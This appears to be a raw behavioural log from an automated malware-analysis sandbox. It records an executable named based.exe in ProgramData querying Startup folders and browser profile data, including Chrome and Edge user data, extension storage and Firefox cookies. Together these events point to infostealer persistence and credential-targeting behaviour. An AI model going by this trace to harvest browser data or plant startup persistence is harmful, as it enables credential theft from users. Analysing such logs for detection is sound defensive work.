Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\_ssl.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\_hashlib.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\_queue.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\unicodedata.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fa VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr_CA VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hr VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hu VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hy VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\id VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\is VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lv VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mn VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ms VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pa VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformation
